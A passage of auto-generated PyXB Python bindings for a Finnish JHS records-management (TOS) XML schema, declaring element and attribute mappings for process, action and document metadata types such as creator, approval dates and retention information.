__LaadittuPvm = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'LaadittuPvm'), 'LaadittuPvm', '__httpskeemat_jhs_suositukset_fitos20150115_kasittelyprosessiTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115LaadittuPvm', False, None, )
LaadittuPvm = property(__LaadittuPvm.value, __LaadittuPvm.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}MuokkaajaNimi uses Python identifier MuokkaajaNimi
__MuokkaajaNimi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'MuokkaajaNimi'), 'MuokkaajaNimi', '__httpskeemat_jhs_suositukset_fitos20150115_kasittelyprosessiTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115MuokkaajaNimi', False, None, )
MuokkaajaNimi = property(__MuokkaajaNimi.value, __MuokkaajaNimi.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}MuokattuPvm uses Python identifier MuokattuPvm
__MuokattuPvm = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'MuokattuPvm'), 'MuokattuPvm', '__httpskeemat_jhs_suositukset_fitos20150115_kasittelyprosessiTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115MuokattuPvm', False, None, )
MuokattuPvm = property(__MuokattuPvm.value, __MuokattuPvm.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}HyvaksyjaNimi uses Python identifier HyvaksyjaNimi
__HyvaksyjaNimi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyjaNimi'), 'HyvaksyjaNimi', '__httpskeemat_jhs_suositukset_fitos20150115_kasittelyprosessiTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115HyvaksyjaNimi', False, None, )
HyvaksyjaNimi = property(__HyvaksyjaNimi.value, __HyvaksyjaNimi.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}HyvaksyttyPvm uses Python identifier HyvaksyttyPvm
__HyvaksyttyPvm = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyttyPvm'), 'HyvaksyttyPvm', '__httpskeemat_jhs_suositukset_fitos20150115_kasittelyprosessiTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115HyvaksyttyPvm', False, None, )
HyvaksyttyPvm = property(__HyvaksyttyPvm.value, __HyvaksyttyPvm.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}VoimassaoloAlkaaPvm uses Python identifier VoimassaoloAlkaaPvm
__VoimassaoloAlkaaPvm = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloAlkaaPvm'), 'VoimassaoloAlkaaPvm', '__httpskeemat_jhs_suositukset_fitos20150115_kasittelyprosessiTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115VoimassaoloAlkaaPvm', False, None, )
VoimassaoloAlkaaPvm = property(__VoimassaoloAlkaaPvm.value, __VoimassaoloAlkaaPvm.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}VoimassaoloPaattyyPvm uses Python identifier VoimassaoloPaattyyPvm
__VoimassaoloPaattyyPvm = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloPaattyyPvm'), 'VoimassaoloPaattyyPvm', '__httpskeemat_jhs_suositukset_fitos20150115_kasittelyprosessiTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115VoimassaoloPaattyyPvm', False, None, )
VoimassaoloPaattyyPvm = property(__VoimassaoloPaattyyPvm.value, __VoimassaoloPaattyyPvm.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}PaatietoryhmatTeksti uses Python identifier PaatietoryhmatTeksti
__PaatietoryhmatTeksti = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'PaatietoryhmatTeksti'), 'PaatietoryhmatTeksti', '__httpskeemat_jhs_suositukset_fitos20150115_kasittelyprosessiTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115PaatietoryhmatTeksti', False, None, )
PaatietoryhmatTeksti = property(__PaatietoryhmatTeksti.value, __PaatietoryhmatTeksti.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}ProsessinOmistajaNimi uses Python identifier ProsessinOmistajaNimi
__ProsessinOmistajaNimi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'ProsessinOmistajaNimi'), 'ProsessinOmistajaNimi', '__httpskeemat_jhs_suositukset_fitos20150115_kasittelyprosessiTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115ProsessinOmistajaNimi', False, None, )
ProsessinOmistajaNimi = property(__ProsessinOmistajaNimi.value, __ProsessinOmistajaNimi.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}KokoavanProsessitunnuksenLahdeTeksti uses Python identifier KokoavanProsessitunnuksenLahdeTeksti
__KokoavanProsessitunnuksenLahdeTeksti = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'KokoavanProsessitunnuksenLahdeTeksti'), 'KokoavanProsessitunnuksenLahdeTeksti', '__httpskeemat_jhs_suositukset_fitos20150115_kasittelyprosessiTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115KokoavanProsessitunnuksenLahdeTeksti', False, None, )
KokoavanProsessitunnuksenLahdeTeksti = property(__KokoavanProsessitunnuksenLahdeTeksti.value, __KokoavanProsessitunnuksenLahdeTeksti.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}Laajennos uses Python identifier Laajennos
__Laajennos = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Laajennos'), 'Laajennos', '__httpskeemat_jhs_suositukset_fitos20150115_kasittelyprosessiTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115Laajennos', True, None, )
Laajennos = property(__Laajennos.value, __Laajennos.set, None, 'Yleinen laajennoselementti. Laajennoksilla mahdollistetaan organisaatiokohtaiset elementit.')
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}Asiasanat uses Python identifier Asiasanat
__Asiasanat = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Asiasanat'), 'Asiasanat', '__httpskeemat_jhs_suositukset_fitos20150115_kasittelyprosessiTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115Asiasanat', True, None, )
Asiasanat = property(__Asiasanat.value, __Asiasanat.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}Toimenpidetiedot uses Python identifier Toimenpidetiedot
__Toimenpidetiedot = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Toimenpidetiedot'), 'Toimenpidetiedot', '__httpskeemat_jhs_suositukset_fitos20150115_kasittelyprosessiTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115Toimenpidetiedot', True, None, )
Toimenpidetiedot = property(__Toimenpidetiedot.value, __Toimenpidetiedot.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}Kayttorajoitustiedot uses Python identifier Kayttorajoitustiedot
__Kayttorajoitustiedot = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Kayttorajoitustiedot'), 'Kayttorajoitustiedot', '__httpskeemat_jhs_suositukset_fitos20150115_kasittelyprosessiTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115Kayttorajoitustiedot', False, None, )
Kayttorajoitustiedot = property(__Kayttorajoitustiedot.value, __Kayttorajoitustiedot.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}Sailytysaikatiedot uses Python identifier Sailytysaikatiedot
__Sailytysaikatiedot = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Sailytysaikatiedot'), 'Sailytysaikatiedot', '__httpskeemat_jhs_suositukset_fitos20150115_kasittelyprosessiTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115Sailytysaikatiedot', False, None, )
Sailytysaikatiedot = property(__Sailytysaikatiedot.value, __Sailytysaikatiedot.set, None, None)
# Attribute {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}id uses Python identifier id
__id = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'id'), 'id', '__httpskeemat_jhs_suositukset_fitos20150115_kasittelyprosessiTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115id', _module_typeBindings.idTyyppi, required=True)
__id._DeclarationLocation = None
__id._UseLocation = None
id = property(__id.value, __id.set, None, None)
_ElementMap.update({
__OrganisaatioNimi.name() : __OrganisaatioNimi,
__TietojarjestelmaNimi.name() : __TietojarjestelmaNimi,
__LaatijaNimi.name() : __LaatijaNimi,
__LaadittuPvm.name() : __LaadittuPvm,
__MuokkaajaNimi.name() : __MuokkaajaNimi,
__MuokattuPvm.name() : __MuokattuPvm,
__HyvaksyjaNimi.name() : __HyvaksyjaNimi,
__HyvaksyttyPvm.name() : __HyvaksyttyPvm,
__VoimassaoloAlkaaPvm.name() : __VoimassaoloAlkaaPvm,
__VoimassaoloPaattyyPvm.name() : __VoimassaoloPaattyyPvm,
__PaatietoryhmatTeksti.name() : __PaatietoryhmatTeksti,
__ProsessinOmistajaNimi.name() : __ProsessinOmistajaNimi,
__KokoavanProsessitunnuksenLahdeTeksti.name() : __KokoavanProsessitunnuksenLahdeTeksti,
__Laajennos.name() : __Laajennos,
__Asiasanat.name() : __Asiasanat,
__Toimenpidetiedot.name() : __Toimenpidetiedot,
__Kayttorajoitustiedot.name() : __Kayttorajoitustiedot,
__Sailytysaikatiedot.name() : __Sailytysaikatiedot
})
_AttributeMap.update({
__id.name() : __id
})
_module_typeBindings.kasittelyprosessiTiedotTyyppi = kasittelyprosessiTiedotTyyppi
Namespace.addCategoryObject('typeBinding', 'kasittelyprosessiTiedotTyyppi', kasittelyprosessiTiedotTyyppi)
# Complex type {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}toimenpidetiedotTyyppi with content type ELEMENT_ONLY
class toimenpidetiedotTyyppi (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}toimenpidetiedotTyyppi with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'toimenpidetiedotTyyppi')
_XSDLocation = None
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}ToimenpiteenKuvausTeksti uses Python identifier ToimenpiteenKuvausTeksti
__ToimenpiteenKuvausTeksti = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'ToimenpiteenKuvausTeksti'), 'ToimenpiteenKuvausTeksti', '__httpskeemat_jhs_suositukset_fitos20150115_toimenpidetiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115ToimenpiteenKuvausTeksti', False, None, )
ToimenpiteenKuvausTeksti = property(__ToimenpiteenKuvausTeksti.value, __ToimenpiteenKuvausTeksti.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}ToimenpideluokkaTeksti uses Python identifier ToimenpideluokkaTeksti
__ToimenpideluokkaTeksti = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'ToimenpideluokkaTeksti'), 'ToimenpideluokkaTeksti', '__httpskeemat_jhs_suositukset_fitos20150115_toimenpidetiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115ToimenpideluokkaTeksti', False, None, )
ToimenpideluokkaTeksti = property(__ToimenpideluokkaTeksti.value, __ToimenpideluokkaTeksti.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}ToimenpideluokkaTarkenneTeksti uses Python identifier ToimenpideluokkaTarkenneTeksti
__ToimenpideluokkaTarkenneTeksti = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'ToimenpideluokkaTarkenneTeksti'), 'ToimenpideluokkaTarkenneTeksti', '__httpskeemat_jhs_suositukset_fitos20150115_toimenpidetiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115ToimenpideluokkaTarkenneTeksti', False, None, )
ToimenpideluokkaTarkenneTeksti = property(__ToimenpideluokkaTarkenneTeksti.value, __ToimenpideluokkaTarkenneTeksti.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}KasittelyprosessinTilaTeksti uses Python identifier KasittelyprosessinTilaTeksti
__KasittelyprosessinTilaTeksti = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'KasittelyprosessinTilaTeksti'), 'KasittelyprosessinTilaTeksti', '__httpskeemat_jhs_suositukset_fitos20150115_toimenpidetiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115KasittelyprosessinTilaTeksti', False, None, )
KasittelyprosessinTilaTeksti = property(__KasittelyprosessinTilaTeksti.value, __KasittelyprosessinTilaTeksti.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}OrganisaatioNimi uses Python identifier OrganisaatioNimi
__OrganisaatioNimi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'OrganisaatioNimi'), 'OrganisaatioNimi', '__httpskeemat_jhs_suositukset_fitos20150115_toimenpidetiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115OrganisaatioNimi', False, None, )
OrganisaatioNimi = property(__OrganisaatioNimi.value, __OrganisaatioNimi.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}TietojarjestelmaNimi uses Python identifier TietojarjestelmaNimi
__TietojarjestelmaNimi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'TietojarjestelmaNimi'), 'TietojarjestelmaNimi', '__httpskeemat_jhs_suositukset_fitos20150115_toimenpidetiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115TietojarjestelmaNimi', False, None, )
TietojarjestelmaNimi = property(__TietojarjestelmaNimi.value, __TietojarjestelmaNimi.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}LaatijaNimi uses Python identifier LaatijaNimi
__LaatijaNimi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'LaatijaNimi'), 'LaatijaNimi', '__httpskeemat_jhs_suositukset_fitos20150115_toimenpidetiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115LaatijaNimi', False, None, )
LaatijaNimi = property(__LaatijaNimi.value, __LaatijaNimi.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}LaadittuPvm uses Python identifier LaadittuPvm
__LaadittuPvm = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'LaadittuPvm'), 'LaadittuPvm', '__httpskeemat_jhs_suositukset_fitos20150115_toimenpidetiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115LaadittuPvm', False, None, )
LaadittuPvm = property(__LaadittuPvm.value, __LaadittuPvm.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}MuokkaajaNimi uses Python identifier MuokkaajaNimi
__MuokkaajaNimi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'MuokkaajaNimi'), 'MuokkaajaNimi', '__httpskeemat_jhs_suositukset_fitos20150115_toimenpidetiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115MuokkaajaNimi', False, None, )
MuokkaajaNimi = property(__MuokkaajaNimi.value, __MuokkaajaNimi.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}MuokattuPvm uses Python identifier MuokattuPvm
__MuokattuPvm = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'MuokattuPvm'), 'MuokattuPvm', '__httpskeemat_jhs_suositukset_fitos20150115_toimenpidetiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115MuokattuPvm', False, None, )
MuokattuPvm = property(__MuokattuPvm.value, __MuokattuPvm.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}HyvaksyjaNimi uses Python identifier HyvaksyjaNimi
__HyvaksyjaNimi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyjaNimi'), 'HyvaksyjaNimi', '__httpskeemat_jhs_suositukset_fitos20150115_toimenpidetiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115HyvaksyjaNimi', False, None, )
HyvaksyjaNimi = property(__HyvaksyjaNimi.value, __HyvaksyjaNimi.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}HyvaksyttyPvm uses Python identifier HyvaksyttyPvm
__HyvaksyttyPvm = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyttyPvm'), 'HyvaksyttyPvm', '__httpskeemat_jhs_suositukset_fitos20150115_toimenpidetiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115HyvaksyttyPvm', False, None, )
HyvaksyttyPvm = property(__HyvaksyttyPvm.value, __HyvaksyttyPvm.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}VoimassaoloAlkaaPvm uses Python identifier VoimassaoloAlkaaPvm
__VoimassaoloAlkaaPvm = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloAlkaaPvm'), 'VoimassaoloAlkaaPvm', '__httpskeemat_jhs_suositukset_fitos20150115_toimenpidetiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115VoimassaoloAlkaaPvm', False, None, )
VoimassaoloAlkaaPvm = property(__VoimassaoloAlkaaPvm.value, __VoimassaoloAlkaaPvm.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}VoimassaoloPaattyyPvm uses Python identifier VoimassaoloPaattyyPvm
__VoimassaoloPaattyyPvm = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloPaattyyPvm'), 'VoimassaoloPaattyyPvm', '__httpskeemat_jhs_suositukset_fitos20150115_toimenpidetiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115VoimassaoloPaattyyPvm', False, None, )
VoimassaoloPaattyyPvm = property(__VoimassaoloPaattyyPvm.value, __VoimassaoloPaattyyPvm.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}Laajennos uses Python identifier Laajennos
__Laajennos = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Laajennos'), 'Laajennos', '__httpskeemat_jhs_suositukset_fitos20150115_toimenpidetiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115Laajennos', True, None, )
Laajennos = property(__Laajennos.value, __Laajennos.set, None, 'Yleinen laajennoselementti. Laajennoksilla mahdollistetaan organisaatiokohtaiset elementit.')
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}Toimenpidetiedot uses Python identifier Toimenpidetiedot
__Toimenpidetiedot = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Toimenpidetiedot'), 'Toimenpidetiedot', '__httpskeemat_jhs_suositukset_fitos20150115_toimenpidetiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115Toimenpidetiedot', True, None, )
Toimenpidetiedot = property(__Toimenpidetiedot.value, __Toimenpidetiedot.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}Asiakirjatieto uses Python identifier Asiakirjatieto
__Asiakirjatieto = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Asiakirjatieto'), 'Asiakirjatieto', '__httpskeemat_jhs_suositukset_fitos20150115_toimenpidetiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115Asiakirjatieto', True, None, )
Asiakirjatieto = property(__Asiakirjatieto.value, __Asiakirjatieto.set, None, None)
# Attribute {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}id uses Python identifier id
__id = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'id'), 'id', '__httpskeemat_jhs_suositukset_fitos20150115_toimenpidetiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115id', _module_typeBindings.idTyyppi, required=True)
__id._DeclarationLocation = None
__id._UseLocation = None
id = property(__id.value, __id.set, None, None)
_ElementMap.update({
__ToimenpiteenKuvausTeksti.name() : __ToimenpiteenKuvausTeksti,
__ToimenpideluokkaTeksti.name() : __ToimenpideluokkaTeksti,
__ToimenpideluokkaTarkenneTeksti.name() : __ToimenpideluokkaTarkenneTeksti,
__KasittelyprosessinTilaTeksti.name() : __KasittelyprosessinTilaTeksti,
__OrganisaatioNimi.name() : __OrganisaatioNimi,
__TietojarjestelmaNimi.name() : __TietojarjestelmaNimi,
__LaatijaNimi.name() : __LaatijaNimi,
__LaadittuPvm.name() : __LaadittuPvm,
__MuokkaajaNimi.name() : __MuokkaajaNimi,
__MuokattuPvm.name() : __MuokattuPvm,
__HyvaksyjaNimi.name() : __HyvaksyjaNimi,
__HyvaksyttyPvm.name() : __HyvaksyttyPvm,
__VoimassaoloAlkaaPvm.name() : __VoimassaoloAlkaaPvm,
__VoimassaoloPaattyyPvm.name() : __VoimassaoloPaattyyPvm,
__Laajennos.name() : __Laajennos,
__Toimenpidetiedot.name() : __Toimenpidetiedot,
__Asiakirjatieto.name() : __Asiakirjatieto
})
_AttributeMap.update({
__id.name() : __id
})
_module_typeBindings.toimenpidetiedotTyyppi = toimenpidetiedotTyyppi
Namespace.addCategoryObject('typeBinding', 'toimenpidetiedotTyyppi', toimenpidetiedotTyyppi)
# Complex type {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}asiakirjatietoTyyppi with content type ELEMENT_ONLY
class asiakirjatietoTyyppi (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}asiakirjatietoTyyppi with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'asiakirjatietoTyyppi')
_XSDLocation = None
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}AsiakirjaluokkaTeksti uses Python identifier AsiakirjaluokkaTeksti
__AsiakirjaluokkaTeksti = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'AsiakirjaluokkaTeksti'), 'AsiakirjaluokkaTeksti', '__httpskeemat_jhs_suositukset_fitos20150115_asiakirjatietoTyyppi_httpskeemat_jhs_suositukset_fitos20150115AsiakirjaluokkaTeksti', False, None, )
AsiakirjaluokkaTeksti = property(__AsiakirjaluokkaTeksti.value, __AsiakirjaluokkaTeksti.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}OrganisaatioNimi uses Python identifier OrganisaatioNimi
__OrganisaatioNimi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'OrganisaatioNimi'), 'OrganisaatioNimi', '__httpskeemat_jhs_suositukset_fitos20150115_asiakirjatietoTyyppi_httpskeemat_jhs_suositukset_fitos20150115OrganisaatioNimi', False, None, )
OrganisaatioNimi = property(__OrganisaatioNimi.value, __OrganisaatioNimi.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}TietojarjestelmaNimi uses Python identifier TietojarjestelmaNimi
__TietojarjestelmaNimi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'TietojarjestelmaNimi'), 'TietojarjestelmaNimi', '__httpskeemat_jhs_suositukset_fitos20150115_asiakirjatietoTyyppi_httpskeemat_jhs_suositukset_fitos20150115TietojarjestelmaNimi', False, None, )
TietojarjestelmaNimi = property(__TietojarjestelmaNimi.value, __TietojarjestelmaNimi.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}LaatijaNimi uses Python identifier LaatijaNimi
__LaatijaNimi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'LaatijaNimi'), 'LaatijaNimi', '__httpskeemat_jhs_suositukset_fitos20150115_asiakirjatietoTyyppi_httpskeemat_jhs_suositukset_fitos20150115LaatijaNimi', False, None, )
LaatijaNimi = property(__LaatijaNimi.value, __LaatijaNimi.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}LaadittuPvm uses Python identifier LaadittuPvm
__LaadittuPvm = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'LaadittuPvm'), 'LaadittuPvm', '__httpskeemat_jhs_suositukset_fitos20150115_asiakirjatietoTyyppi_httpskeemat_jhs_suositukset_fitos20150115LaadittuPvm', False, None, )
LaadittuPvm = property(__LaadittuPvm.value, __LaadittuPvm.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}MuokkaajaNimi uses Python identifier MuokkaajaNimi
__MuokkaajaNimi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'MuokkaajaNimi'), 'MuokkaajaNimi', '__httpskeemat_jhs_suositukset_fitos20150115_asiakirjatietoTyyppi_httpskeemat_jhs_suositukset_fitos20150115MuokkaajaNimi', False, None, )
MuokkaajaNimi = property(__MuokkaajaNimi.value, __MuokkaajaNimi.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}MuokattuPvm uses Python identifier MuokattuPvm
__MuokattuPvm = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'MuokattuPvm'), 'MuokattuPvm', '__httpskeemat_jhs_suositukset_fitos20150115_asiakirjatietoTyyppi_httpskeemat_jhs_suositukset_fitos20150115MuokattuPvm', False, None, )
MuokattuPvm = property(__MuokattuPvm.value, __MuokattuPvm.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}HyvaksyjaNimi uses Python identifier HyvaksyjaNimi
__HyvaksyjaNimi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyjaNimi'), 'HyvaksyjaNimi', '__httpskeemat_jhs_suositukset_fitos20150115_asiakirjatietoTyyppi_httpskeemat_jhs_suositukset_fitos20150115HyvaksyjaNimi', False, None, )
HyvaksyjaNimi = property(__HyvaksyjaNimi.value, __HyvaksyjaNimi.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}HyvaksyttyPvm uses Python identifier HyvaksyttyPvm
__HyvaksyttyPvm = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyttyPvm'), 'HyvaksyttyPvm', '__httpskeemat_jhs_suositukset_fitos20150115_asiakirjatietoTyyppi_httpskeemat_jhs_suositukset_fitos20150115HyvaksyttyPvm', False, None, )
HyvaksyttyPvm = property(__HyvaksyttyPvm.value, __HyvaksyttyPvm.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}VoimassaoloAlkaaPvm uses Python identifier VoimassaoloAlkaaPvm
__VoimassaoloAlkaaPvm = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloAlkaaPvm'), 'VoimassaoloAlkaaPvm', '__httpskeemat_jhs_suositukset_fitos20150115_asiakirjatietoTyyppi_httpskeemat_jhs_suositukset_fitos20150115VoimassaoloAlkaaPvm', False, None, )
VoimassaoloAlkaaPvm = property(__VoimassaoloAlkaaPvm.value, __VoimassaoloAlkaaPvm.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}VoimassaoloPaattyyPvm uses Python identifier VoimassaoloPaattyyPvm
__VoimassaoloPaattyyPvm = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloPaattyyPvm'), 'VoimassaoloPaattyyPvm', '__httpskeemat_jhs_suositukset_fitos20150115_asiakirjatietoTyyppi_httpskeemat_jhs_suositukset_fitos20150115VoimassaoloPaattyyPvm', False, None, )
VoimassaoloPaattyyPvm = property(__VoimassaoloPaattyyPvm.value, __VoimassaoloPaattyyPvm.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}PaatietoryhmatTeksti uses Python identifier PaatietoryhmatTeksti
__PaatietoryhmatTeksti = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'PaatietoryhmatTeksti'), 'PaatietoryhmatTeksti', '__httpskeemat_jhs_suositukset_fitos20150115_asiakirjatietoTyyppi_httpskeemat_jhs_suositukset_fitos20150115PaatietoryhmatTeksti', False, None, )
PaatietoryhmatTeksti = property(__PaatietoryhmatTeksti.value, __PaatietoryhmatTeksti.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}AsiakirjaluokkaTarkenneTeksti uses Python identifier AsiakirjaluokkaTarkenneTeksti
